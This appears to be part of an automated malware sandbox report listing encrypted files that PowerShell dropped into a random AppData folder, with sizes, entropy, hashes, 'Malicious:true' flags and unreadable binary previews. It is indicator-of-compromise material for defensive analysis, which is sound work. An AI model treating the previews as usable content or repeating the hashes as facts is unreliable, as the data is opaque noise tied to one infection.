                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):68686
                                                                                                    Entropy (8bit):7.996766566502999
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:rXv7pC50/YuAx7ZXR0hrmHuBKeIclqBU7ln6DdNK:b7pCC/YFVeKusehx
                                                                                                    MD5:223B15F507487B87C32C614C8C5618DF
                                                                                                    SHA1:AD3CE12066344FB6E4A415ADA1FCD7295DA1E1BC
                                                                                                    SHA-256:8F0AEDF4640D6B9996895A5D2E1B257D620CCB6AC173891E01163038C5141289
                                                                                                    SHA-512:CBDD7667142EC1EC98976362344B5EA28EDD416CD49D18F99FA313DD9D07602AB5CEF9747EBE106018A4B856CA8DC2E2797E43687872C263142DF6061AC6B8B1
                                                                                                    Malicious:true
                                                                                                    Preview: .N-. 4/.....`.....{g..5..../...(...Tl.i'5......4m,#..Z....).H8.0 /|~..@.<...o=.".n#-t....Z.h..Zz..k....W.i....p..v.`...E}..9.'...1..0...NI.;...@.ez..{D.>u.+B..A........n;c...3.K...*.z....../E@.9./......?..5....e...S..D)6y.....F^\.).!j*;..u...._..;.H.KVTG.3.48.<B_<Hr......d...A.&......F.#L.K.=..X..9ogin.|.<.....E.`..^..v...p.O8...r..aT.iu.H..q.z./....Y....)>["..........E..i...X....1w...L..]7q..2h~.._..P.Lm....6=.....z.!X.bl&wwQ*..(.'.@%2."..3.,.l.q.=C..Y&..h..J..3^.HT..5.a8iK....-.{.9..0....i..O^..x:... ......ib...$z.$.L.Z.O.$T^7.oA..r^........*.~.w.[......o..X.`..v..\Z......")z...S{...l..........X..I..%..E..>..e.\fc.....N5...u.....2%}.F.6=..j...AWuJR..S.M.....k.}.K2....tJ..D.a..(.mB..8/.O{.m...zF\.w...O!p.i6Z..BO..ET~.....,;..!V.8......n.....dR.....a..4.q........a...t.2.q.P..U.+../.Y.9.T|......[..#../....].U...y+..p.f......5..........m....Aa.....).w.H7....'.....k*<.........S;|.9..aX.t.a....i I.,Z}..X+.".(..]..A\(o{.q..{.X..,.\4&.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bApIDQShGjqdlWw.naKDegqTjLCPOGiBU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105675
                                                                                                    Entropy (8bit):7.998375875864055
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:RgRSmNJjW9uiE6PTj+hoOu5IoreyZElt19cwxgwURG+6tlRw0Un2kmvjc98:RgRSQJoNEwTSi7moqyZtGUc+eykvjZ
                                                                                                    MD5:CB79751F800973326A22FC57F96BA145
                                                                                                    SHA1:8D32B9B0FFA97E83FA18F99169B2E186C7D593BC
                                                                                                    SHA-256:5BF1FF3BC11BB5C6BFE7487EA5436C5731A1D96F185083B132F964437D0A8504
                                                                                                    SHA-512:39F815C8E05E3453ADF386C6D92A1CA33339DF151070AD659FD71FBA78D3B5D6E10E3AC4CB077C0F9E6B6C8774F5F962D311ABF2ACBA1CBC39061FD667F0168F
                                                                                                    Malicious:true
                                                                                                    Preview: .....9..N..v..L.\#...F.d...UY......8yf..g..i)p.B3Bh.....%m.-.r.o..<....iP..k[..%......@..9.T.. k..P.R.'U2.B.....b.P>..4|..g...J.WS.P;.qZ|l.rB ..e..,........6!.p ...L&$..S....tGkD..z.d..G|..$Z..R.Z.k?.._.AU...xg...\.5D..V../%....P.A.ke.Nb4.EW62.. ..%.f...0o.G2....`...W........l.....yq..M4U2...q...Y...J?...}.7r..r......<...........)........T.....p.{Y<H.+...^..?I".;....t..0tA...Xsn..~.Y....T..E..h...v(Z..T..../5y.}>...;b'.K_..<...|.$U.....#.8...f6....R.O].W.....M...b'..$lu?....0^.oF.*h...J...0..!%<.....s.B..{.W0...n.&./...sa...r[.Z....GL%...s..g..|G..v...{3.".{c...[.B.w..^j..aZ*+......cH..b...M.. .T....]ET..W....j..Iq....e..G...up..6....N ..1B...@.(l......).:...hE..i.z.V"...#T.6v@.....L...Y..s&....|.M.....Z.....W._....+......&I..;....C=..w.`..jE..Q2g..1LNq...u..xl.T.......x...:....,..u...'.[.....Z..d4.......P5p..K...2. .1)e.x...~.SC.Eh..G.\D&)..Uk...C^njM.[.oD.1..?.Lg.;.Ey..<!.....R..u......k.q....".t0..g....XH0...qL....b{.0/......V...t.>
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bBhLMZRYrqAjmneT.ASclNopVXWiGux
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):95225
                                                                                                    Entropy (8bit):7.997885672228678
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:nCd2uyUln7/n+SOB3HrCiRoCxjapXpi5D3Gx9EweFCRrYxwgCnycm/xpxMk+UMxq:1uFl72SOZWs/jgi527daPaPnwpx0UMxq
                                                                                                    MD5:53A28D35AA167BDA5A8458888F7F1386
                                                                                                    SHA1:299D40200288F460013AAD9DD117C2EFB4A6F127
                                                                                                    SHA-256:A03F051F196A212A2F6C7D2DC99721E27B04722914BD609530D6CCA41CD24A51
                                                                                                    SHA-512:CBDC5C16474300990EA0AE6170F771F3B773F44F5280F104B607F692D22DB8D02EB6A1DE4D0338BE380C904C4959BEB1F1ECD9D18F23FE9CB979B6F8C9CA9931
                                                                                                    Malicious:true
                                                                                                    Preview: ...a....C.O?.S..x._.[Z..s....Q..J..!..].........:.O..S.]...O.....-.......w.,...g...4...Wl..70..\.....Rt.d.0...+...c....4m........}...E...A&W... h..c..$zC#....s.j\D..Ea.5.../....>..X.!.y.....5p.<R...rl-..k.[..5'......d..2*.B...<..8.-%..u...S...;..\]...X)]}...:.y.?n....7..L]....q#.k...b.......9E.2K>.m%^u}...r.{.2.....#.T.r..$=.x.&. ...2..>.....p....''G.w....h..?U....^e&P.@p...9...}..........X.r3.^.....S....<..{.WT.*...T...N.....U.'.8~...u...........k#....{.}../GL......c.n.h...V...^.[l.".D..~..R...c.J...P5.K.i.'d%...Qj...O.\TtA.s...ww....6........!i....._......6LY.4..[.F3...t.~:. .e_i=......u......-$L.Sjc..j)A-........J...8..kK...|....g..L.KU>.....A.1..].6.Y........p....h.V.j.!*.D[_.`v{......X'.."q....C<H...7....vA(..Z.."V.O......I..b.#-t..#Z....wA..|J........x9.k......b,..J...#.6.<.....4....!9...b.....{>...a>.=BC.l?J./g..f%...&...'_.@.anv...\$.g.%\S.Pof..U9k..fB...lUU...>..B\..n......p+..5._(l....qM..w....>..."..,?..)....nwn4
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bDvTyXjJYBxmzetou.YVNGpZfmxqFJwtu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):153305
                                                                                                    Entropy (8bit):7.998874488326099
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:LN3qPKR3UMsgbbdN7uuxKijj+ADuKtgjRHeYlPr/jkL5nfmijG:x32MrRpuw/fDXg0SD/jG5nfzjG
                                                                                                    MD5:13ED3D0748ED51320C498E6F685940F0
                                                                                                    SHA1:BAE452F2A3ABF93294AA291419A3BA433C433739
                                                                                                    SHA-256:272E7F588FE86A1A4DEEAD321C4AFBAE89897EFAF09F13E27079DCAFBED507A3
                                                                                                    SHA-512:9B242D5FFE69228C85627A5DEDD02AA13D6481202CE4ABA4FB4983A76D3A6ECB85991B7DA44DE3E04286DA9FE8974FB6DD79A12E1035EFF95851DF3F42398B53
                                                                                                    Malicious:true
                                                                                                    Preview: {$.X.g.[..db..E.;q........J.=..r.J_..%..!..N..t.A.E_Rl...Q...|..X..q.......M..HC..-.....|.c....\i...,<...uj2.hi......m..8.][...y....N}...".c(.....ID..0o....A9a.....@../...>_~pUY..s5.....Le....LN..+W...k}.G0.....rj:.~.1*.9.6.Q(..u.)..mY.#Sb....U.n...-{PO5pi.>u.......Z..E.q.Me=.....>.....C....Y.[W1Y/:,.}.C..+J^.%ka.z.......e...|.H.q...<....HL.:...u[.z.I.&..eJ..j.^$.......U.&+....Rq3.a."..As*..(@..'.K..y......oI.].7.....&...g....bm.5.n.}R...6..*a:..<...A$...6;...p.V.....x.[.c..'...eJ...x..o,....e..6..4........%.r#...X.e./..6.)....=*........V\4.0q.....ed.[..k..L".n.s.&.....E)....,N.1.P....O-....4a....)..I......f.e......G.Y..s.q"iH~..S..R.p.ze7.@mCE......$.b.....^.k...6...Yo.S"#...+y.9.j..B........W=..........>....8....n.q..}p.L..?........\.f.X...v5...6. ...N..vr6e..P......1..._v..E.E....*.\..M...$A=...$...U...-U.......L;...._.8.S}'O.....{l.&...$t.?..(......).`.O.-.N...@#,.9Pu.;...]q......;Q..qZ.Y....A..|.....)...=.(..!.y.m..8..d.'...).H.8.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bFKBPNQUnoewfDECr.qnVyTJtYFZHxz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):192215
                                                                                                    Entropy (8bit):7.999062622232931
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:wONmd2nlbUHG87B3kgnLbOU4t0KcDd9l/6b6FyZlXvMgm9bhXXrpmQx:dm4nK7B3km+tjcDd9Fz0ZF0gm9bXx
                                                                                                    MD5:A7DE2DE5904B329EA068127329EF1B49
                                                                                                    SHA1:41E7EAE3499DB4F52ECDB6C8D9731E59415353A6
                                                                                                    SHA-256:ED61C14CBE8880AAD4A81742258B70FE31DD9FD33CE1B96A9FBCD062F6280544
                                                                                                    SHA-512:73849743CE8E14A99AC7F4AC8AC69894A0D5FCF48CED0104010FEAD32AA22B9C9FDB10CD452F1336D2C8477FE8194E54A487177EA0F4B795D58FC1B1222175C8
                                                                                                    Malicious:true
                                                                                                    Preview: P*?.3l...R.2.qJ${.h.}._j3Ql*#.v.T!...3i.pv.,.B.....%E....?......j...W1Gk.#.%3.....+uQ.N...2N...aP.d..;.I..s..X.U\7.2.. .'D}....H...%.\e,.>J..f[".Bh1/.D...H3....../z.'..T..V.!.#.....HG!*e....Y.......).1n.`.'Az..k|.@<.Ou....|..BOSY...kI..6.L..~...B.b.x..........!.K^.e)c.).U{...TT..s.Op..d.u..]<651.g......]..Mu......Q...}t.....l.O#.V..#...........].p..nm;.:>}5.Q....U-7...]...D^ej.7.nL+G1N....9;B..w..8....sy.}.....-.zj......D....1.\.z..{;..2......%....P.....O..7r.$.P!>.>..2..%...a.*..an...P..u.v...YZ..9s.*..(../]....;..c.. *z.....?....m<6_v....hc.{..D..Y.rS.........l.....q8.."=..V2]K...K.~...h..O....r....s.SP....L:. .p....hWK8 s.^..`.........~.....n.......x,.c.y..~9]...A.K...Iq.......5;.u..n....X..N...A>.5....r/\..h|'P......w..P.Vz.s.~...F........La.p.%cdxJ..=..e..D....I.Y....+c(.\.z.x..p..H...+.....\NOH.._..k.Z.;....i..".F..O..L-e.....1^.?u.....X..\)y9W.G}Yf.6>....3...e#4].....F.>.j.k....v.{.[.(.7q%.Z..V..o4b.....[>*..$..|....Jm ..G.Df.&.~.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bGBjUzNTFSfVDMxwy.UMBTVDaYozW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74593
                                                                                                    Entropy (8bit):7.997678027182254
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:/IV3+3Pq/7sRQYgt6VimRutxak00Bp8hWPMZ1CP4:QVO2sRZW6w1s0L8PH
                                                                                                    MD5:D7E22B719C0FEFE5660A608DD180DBC5
                                                                                                    SHA1:9BA5BD5F07D5F0C4F21EBC2B60776BE55CE83E5B
                                                                                                    SHA-256:F3D1EF71DDE0DA94692AF704D8B6E75B84FB7DD21B68290FBCD2E983C8399303
                                                                                                    SHA-512:0B0A7D468EE57BDDD4A0794CFE93D5EF863739314968DD4BB4F73CEA99E32CA9C15ADFDF06595F828785C92A14C8F85557D21BFDD6C995A080EB2CFD91EB0A96
                                                                                                    Malicious:true
                                                                                                    Preview: ..i.....x.....8.!.,^#E.......o....+.h.g.E....R< ..aTwv.........,...Xi.e.Wf.../#.PO..s7........tB:..G..Jm....M1..".........Dq*T..].!l.9..:..hx..nh.....A...z....7[..-.E..u.:F}]..E...[..+.3.T....Aj.n;~}.$kN........G.L..d...K.......MM..Of....$........j!.9.kG.g.s.tQp...a..%S.e:.,qK...,Dw...7....H6.%...{mY..[Y...;V=...%,.?.BO.%.-P.z.`o.;.N0..y...L.I..j..8.8...........}..x.41.<{.8....(....}Y..p.~.r.s..[..u.y.\j.f...8.}q....T,.......8.h.p....9....&....G..a5.HT...1}<zJJ.Y.e....J7..,...-%2.'.?.X...P.u.xt..l..].lD.wob.TL%.~1.%.E..~...).Z.......:.[.Eb.d..^.G...&....-N...B......*.e.l....5.T..5.....e`-.qZ."w..+..<..e.yA....G.....:.q.U.~...[.(.p..#Z}.#.5...u..g.....xT..$..W.....jH...;.d...uG....-..k...7....n........W...TU..x....e.......j?.&..i._..c.o.C.....@.D.....WH...i..=1..ILI.y...^..Oy..X...U..N..'..R.......J....7U.P...`..K...........LO.....[..? S.$I,..+....82..j.Ev.j.M...).<.d~ym......C...90...c....$.} Qt.....%..W..N..eL........5.."H_...g..|
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\baYIzxdoZBShnFusUW.SxgkZUwfLIGEiFq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):162104
                                                                                                    Entropy (8bit):7.9988258444941085
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:GReXrbQIFjLzQiEHtoDd5+URXShkxvH9hbXULh0qZXCX7Q6BVW4pL7S1u23lM/zL:Ge/QwlnDGUVzdJuSqZX2QujJ7SvW//
                                                                                                    MD5:458C07D799F8E6B5985B04ECCDC37983
                                                                                                    SHA1:6F20BE2E19F3B13E9E6D6F97ABA6C37E9ADF70CD
                                                                                                    SHA-256:74CE5772FA790343FC02CD634BC36FAFFEFD0EBCDCE248CDF392903A124D598B
                                                                                                    SHA-512:90F3C55055E8FCB0427C6E634CB3372DC585C873F4C8A1E6B6F4FE6FDB1EF4AC50B85D4A62E215C81A057E62C5C7882269276B298F92730D6A98333748A470EE
                                                                                                    Malicious:true
                                                                                                    Preview: .'>.....<.:...eY.3.E......p....t.......N.....tj...@.\.'..|.1.oL.$Vr.3...,....W..U..4.}..(<<..l....O..7..I.0..I.bv..@Z.G..W..%..U....\. K..M.?.+.[.iF...B...#.p5wyRZ... .-CY.sx..../...._.w>m/.7...d..K.I7.iOlqg.GY.@I.`A..*...f.{....S..\.....B...m}.{.....!S.X#].[.S..f..,..#.-......[....1kJ<.A........2..l..ha+...+C.&tQ..fN...$....'...^3..^..@|H!.@..5.9......^9...we;..}.)%.e...4_.J....G...r..{....._B...2P.#*..}.S..&#......o...Y.H.D.k...84.H-......0}e.%.....!.7....9....pho.Z..=..(=.1....$...}w..aeJ.tE.zI...f....z...f..........E.k..H.Qh.acL.y.3~..-K.K....,.r..!...;1.`~.E..L.X.)... QD{c$.u....\YBB....}.\..2M...y.'.f...ak..*..t..]........a.1.[.G.a..K..2Ktf..ZA...Z..s.../..=.......u..'..R...V..H_....y.g..AH#2.;...W....@..W.P..y....G[.I.\...#.....in.\8..o.Ir}d./(....g...u..;.H..1.PT..-.l,:.f%... ....f#..u.3E.W.3...q#.5.:. ...H.( ...0....9.9..2}..|.o...q...+.].7......".TOR..8...(k+.$.FQ.KM.M.a['.. |..j.u.QU.......S..L.....2..C....Q....Lm.v......
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bfJvuyYTrXUgLHFiI.mgZFSEtpBiPd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):183052
                                                                                                    Entropy (8bit):7.998923257142434
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:UsDnjwxvqs/81927ruqfO+uqKAVTWYx5+41Lz9s2ko7nD8kM6C:tPwxvqs7rTWZbAV604CLxFkeDBs
                                                                                                    MD5:80B6212D3592D9072D2DA81FAF625D5B
                                                                                                    SHA1:EDDC5F54719698F3C64D125F99FF7A2646801D02
                                                                                                    SHA-256:710FB56380DD748C45F2D1454B02303699FF985E22B5FF9DEE0CA551872B692C
                                                                                                    SHA-512:0457D78C87883A41134FF1F2AA494DA44468CB3BF5BC3F8CE1AD2D76842C07FE51E1542A0CB5B03017AD4C8BB93DC0CEA60E7AA55DA57132276091FB3A6D4C94
                                                                                                    Malicious:true
                                                                                                    Preview: {.'.g{...i..`. Z...hi.......(G.......^......(....s.a..dz.#H.!...@....<Y../.[Z...g.....t.0z..V...c../...-.ra......M.'".....Cms.)...Ao..b.u.......lT..@H9s..o....7....9.gm......-..z8 ............x\(.s..*...q..A.......=.=.dzx..x~L...R.K.."(c..:....ok...=6.. ..r,...<w..a....f._*.t,....=.Q.T.d...7..0v.#c.....-]X=ux#.>."&.`.-.:_....R....8.xCy.&d...=...dSf..n...w.h.d.Vm.(.TS..9:"U/!.e...l...T...0...g.]..F.s...4.@[V.......K...g...9....W.....W...uB-.1....O.E._....mR._..J|.B.E........\...e`.*..\.......Z...X..G^..O....F.oQ+s..,....I .. ...i.o.hE...b:.w0T..!V,...O...6....g..#.=a..R.S.k..T.5.Bc. ....C..G.H....N@z|)H..k...%...R.Xt.T.."........TlI.>..t..C.U.l.U.%q.%...g.p.>.|b....Y.._~.UZ..?:$...#O....YR..X:..;=.....Q.j...Q6....?A.....V......n..]...]...K......>..G.......].ll.\M97....C....N......'QE...t...A..............:.^...65...[.,=...!q..@!..."me...:.BL...U..".2.b.H-.......]C.......__..... ..^.F.a.f...$$.w.OC/_..P.L..EJim......R,q.&P^::.I>.........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\cFeZwbNdUY.FVeoIvhgiBw
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194762
                                                                                                    Entropy (8bit):7.9989803981171015
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:/iX5FpYRHX5NKQMWDMWQnB+9kbpT7DJD3/IUYIiMuuBHDW4Yn/kM/m821zG:/4zpQzKQNDMB2k9Drx1b5s/kqmjzG
                                                                                                    MD5:2B449C2AF240F3D03FE000DE35732820
                                                                                                    SHA1:69B2B6E2E7333CA99183E65DF06302396CB25B8D
                                                                                                    SHA-256:3123A41341D48CDA4F4FEEBE69D2059B4A2941475F54E819906EFEA3EDC91821
                                                                                                    SHA-512:2E2FA2830920088C9788C2F0FB9276D004B6EA46079389E96D890084131A10FA7ACDC9F6DFABBDD5F3FBAF8DFD4540660B5C8ADB2F04A515FF619E1B045D9C9F
                                                                                                    Malicious:true
                                                                                                    Preview: . +.....P.f..@...1.%+t~..Q.....dd..W.1.Y..V..4q....9.|.1Y.X'9p|..t.9].;.b....._............. ..oE%Y...........7<.j_f3..q,;..y...5z..c.{p..3.X.d....A.;^.e..Z....W.W..yd.....q%....M...I..2].. e.W6v..E.#."^..R.@p.......t^.R......:..e..)..".E.#.h_.h.S6.&YB..........G....&...9..#'&(@`..X.NQ".>...+O.v..s.:..N@....tt.w=..<...7..X...s..}..&.$..E........~......(......7c.?H.._.q_.m:...u `k.5y.".g..J#..f.L...Pi......)?.G*h.}Y....x[...v....J......Y....p.X[8..%....?4QS.....g.b.i#.R1......_..i/...B.N.l#C?.S.r....F=.J..f.6.C..&YTA.f....IF....j..".\5VI...(,...00..,.Wp.B*...*....g..o.o).M. ....xy.6To."Z.+i.Bm......K.}_...A.("T.....=...|..}..(..P.),.^.P~..y....,..4\#.<.D.Y.r*...].......=......R"..#-1.ks.}..d.!7..C.j+o......g.......,.}.."...l..9.._... .m......\......=..L...C..-...BN..w..t..{%.....J!$.g...x...P..Z...~...,=.6e.......Bje..J...C.i,..}G.a.*9.~...h..-m._.w...~.o.....I~..c?,..Q..#6-.*Q.T0...}>..P....?.....~..g..}Gs.......R?%..~do.....jz....'...d%y...$..p...)
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\cZOdDupgxkws.KXtgiImeojxpbWPuFvO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):148067
                                                                                                    Entropy (8bit):7.998693486658707
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:pUQfw1aNU5IaY0FcW4Z2tTyqLQdB47bcKrpXxcv1VVJt96Q+:p3wuNuQabbpXxcv1VVJt96Q+
                                                                                                    MD5:1FEB4C230FA324F499C51453C7490AA8
                                                                                                    SHA1:8251205D434D49531C44EEC0FD7D6524FFFB4035
                                                                                                    SHA-256:C2CEE3FF36955016FCB146D60A7912C3F3C202E04752158BCFB95981EFED43D6
                                                                                                    SHA-512:E310208706C34981DA3664561551ACA6D97B34D5A4AAF9029AE4E0F1E0BE927F2BB375DCD675044DAB5BE5D5AE5DB275EACED63E8EB4A4B4D342F753AADE1B20
                                                                                                    Malicious:true
                                                                                                    Preview: re....a.e..4H...~....H?(.E ....orct7~.[f.s!.li.?3CP$.e.v..yA .....].&.y.t|..,..Yq..zJc.W.....F..)7..i......FY.n...!|{r...^}..I............g.}}2..i..%<d.w.x.ke.d.t...p......).J...G9..L..+.]......9.]..|.o...........m}[...L.. .....s;X..?`,.....uh .Q.\%.0........VH.R=...(...E..Dw.%MM',..hn.3{.Z:. ky.4...l....o..v\. ...e'.H..j%.l.d..B..D..f*.........#..$..s.p\.0k...dD....0`.........x_..b.i(............%...a.~..]oa.....:../.....x..9.7Ry..z.....Y...........7. ...Uv8.A..J....3.Q....,1W5'5.._.`.=.<.....p`..2....cW...A..~0=..Xg..Cn.a..W..<#.@u...L.e>..J.....g.Y.an.[.....=.ID.[.#.......<Y..}.......t7....)M@.D.a..9......gfYd...3..@.1....q..X..'..Z.....3v......x.lp.Y<.$.*.%.b<=,.U\..a.C..*.q.k.........h.e$.Ri..:Ax...[..,.WL:/Q..A.7.W..w..r...1.g)..6Yh.{...*.......!..x.C.......'............./.EK.M`.%..j...-..!..2.E.)."........Vt......[....7.9?....i.=9...........xE......ju...X..l.....c#.T..CwsZ.e..7R.F}FJ.+*g..Hp.--??..+..1.{q..P.5-.`..D
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\cmfPUbXzeSDQtolu.cOLVfDuiXmTwQvIxhW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126803
                                                                                                    Entropy (8bit):7.998530691210638
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:IWaD7UW12s11QEPE9xStOr/XOFWh9jpD2DeMdKkGuB:U8M2s1Hg0OTOFWh9Z2SyKduB
                                                                                                    MD5:B7D8573B0FBA78207784A03FE1062931
                                                                                                    SHA1:B4F5873CF0374ED14924B2F5513463C2B82C2078
                                                                                                    SHA-256:58FFF49ECE065D56E85D9446A063DBBC648FF61D979B3F36D7A556C0C1899036
                                                                                                    SHA-512:BB6AAFEC6FCA2F905E93A7621D7E5B608866EBE3390B5006C899944DAF7EDC57BFF3E69430E99721758A49360A10BBB486D1F78C78C1CA203C6DCBA8BB467381
                                                                                                    Malicious:true
                                                                                                    Preview: .Q)..]2:C....-Vf....l.}.:..d....@..`.. I.%)$.9.%......Ps.".t.UY...}#.....{.T.Je.?.y...\./..1.k...E...r.M##.h..../....Z$. k.S..%*..D.T....+............. .p.To...........B,Or^..%]....w.{.2.,..je6.d|=.'8...n {8C....I..xF...N..;z.5.b....Zc..o.n..`X....\c.L.6?...."....0..G"3..?N.T1.Y6g6\..$#;...L.=.'*.y..Ail...AU...y....lmI:c.#..C,...ZR.."A-2....%#..BB.n....j.a.N..Y=.<...:.....hM.......I..R5.C....@k....>^s....m.u.m..P6....d.w1../.'..UI.w.&..o:.B.^0......Y..O\....by..k....'3.....Ra..z+.`..3.@;.oV.kF.B.....N.Z.-#...N..{m.....Y:T......tN.AH..?..Vyozf.H:I....gt.....i.=O..:$........V".E.....u8.N..At..;...x../.!..d....Y.) .F?.n.h.~N$]..q.7jW'.vo..8.Z@..|..Yq..>.X..../O <~".......V..C>3_.i?]..+.........E.!....H.6.d..&...<..T@*.&@?m..$|;.5G..^\N.Z.....#....n.j.jcaN..^..^f.}O..7;..p..2.J..BN.).PUo..s...........2&...K....{...=&-...(.,..g..Q.=W..E.t#.Y.....j.w..#.k.......pB.:.c.\...j..H W-.\../...y>+.....'0...&...Z/S...w..?V..14x...C.... ...6....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dhkaCMvToniNXOjyUze.OnSfPARMCgBeWvsixK
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74005
                                                                                                    Entropy (8bit):7.997316868257508
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HFcQPizsRy8KtY8D3UdKi593M6Xn378WAZ4KK5Y/4giCk6:HzizzTT3i5ZM67bG/jDL
                                                                                                    MD5:4C394F80F3F517C5B4B1C15A1A00CB26
                                                                                                    SHA1:601072167A7683710403A6BD58EFB5907FBEBF13
                                                                                                    SHA-256:7348189CAB24D6714627B5CAE4B7D084B516A682837C2B5BCEBC47DC790013C2
                                                                                                    SHA-512:F5D8A37E7E34BE0CB60FDC9FD019738A92FB86006E1757D61AA3253542DB73F0D3218EB485E400C703B678612A7EE385E2D288F2BB94EA3C7EBD1AA247EEE647
                                                                                                    Malicious:true
                                                                                                    Preview: ...D............$G.?.v.U.....0iX....[5>..JbA_..$.h...>.<..u...A...*....,?..2#.CO...._.+....6@...)..o.n...\....n...%+.......(...}..ep.@l.....'?...hiw...q.q.~;pM-........}..~.....fH..xU.b.....S.C5..z..].d.....8....l.RnQ.=...q*...pB..i.d..o.3.....9..4R)lmOuLF.;.L...>.?..K.n.......2<..X.f....)5p.lE.M..S....~.Z.-M...Z.....X...E".g..sT...J.p.f.y....._.s..]...+.9..ok_..hQ.i=.9$.N.k...G.N8.......7I.`.}t.B.Hl5.d8r...4..k..'..:.KSp.q'@^.mWN.%.*p.0r.^...G..V..{.. .t.Jc...G=l...a.....2).O.T.....6.....t..Q....YB...4C.A....t.jt...pe...V...N.b..9......X@..!...?.....4...>.O..b.sj.....p..5.....D.5a..-._.+.uH..pr.U5C?1V.F....A.n.-@.e..| .w.v.w--.........\Ki.D.k../.<.G......&0.q.}m.*5..`..7:......l..D9fP,3.5..wb>.m^f...8...x.:2mJ...j83+....+.r..p./Z.._3.~.......rJ.92......A(..............c..L....'...S.DU8@_.....eP.......f...!.......iW..'?...~'K.i.f,.l/..y&....+]..."-......]...Js..${....u..0.S..Fs....5g..;H..}....*.YO.qg..-..1.\..u._F.@.fb..j.X..z..$....#:.?
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dhrmUeoMODzQxCWq.NBVdnbxzqp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102774
                                                                                                    Entropy (8bit):7.998211423073378
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:853406xpk9SjETtEvY7+nGOdNoPP6nQ40i/UEOWm1eArMuyX+ooGEKh/ZSCgPGNF:ygp1/M+FAy0iMiiEoYh/ZSwN/9N/NLL
                                                                                                    MD5:F39D4D72A1C122AF133646BB98664094
                                                                                                    SHA1:83FCEAC751B34C1E5994F6EA3ADF22392552AD9C
                                                                                                    SHA-256:065BE2F331EF08ED02FB13FA099218BD0A36B3386A05DCCD86A28E48F39FDA7D
                                                                                                    SHA-512:8413C28959D864B004861B3B7AE41CC92AB63EE217B116F3793D790406A80B4C1C7C426106B2110605316A336ACF5B0CFAFD08FF259DDC697B2D915B15DB8AB4
                                                                                                    Malicious:true
